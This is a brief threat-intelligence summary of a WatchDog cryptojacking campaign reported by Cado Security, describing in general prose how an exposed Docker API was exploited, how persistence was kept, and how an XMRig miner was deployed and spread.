2022-06-07

Cryptojacking Group WatchDog Attack Cabo Labs

Level: 
Tactical
  |  Source: 
Cado Security
Cybersecurity
Information & Technology
Share:

Cryptojacking Group WatchDog Attack Cabo Labs

Researchers at Cado Labs report a cryptojacking attack observed from the company's honeypot. The attack is attributed to cryptojacking group, WatchDog a rival threat group to TeamTNT another known threat actor targeting cloud environments. The campaign was initiated by exploiting a publicly misconfigured Docker API over port 2375 as the default setting was left unsecured, enabling unauthenticated access to the Docker daemon. Once the foothold was established the attacker created a new Alpine Linux Docker container and established persistence with a cron job. The attacker executes a shell script to check the system's infection status listing processes, host configuration, downloads a second-stage payload, and checks user permissions as root permissions are needed for the campaign. The second-stage shell script manipulates the system's timestamp and disables services such as the Alibaba Cloud Agent. The XMRig miner payload is dropped on the compromised host with a system service created for persistence. A third stage payload conducts network scanning, identifying hosts to pivot to, and drops two final scripts to initiate the propagation of the attack further into the victim’s network.

Get trending threats published weekly by the Anvilogic team.

Sign Up Now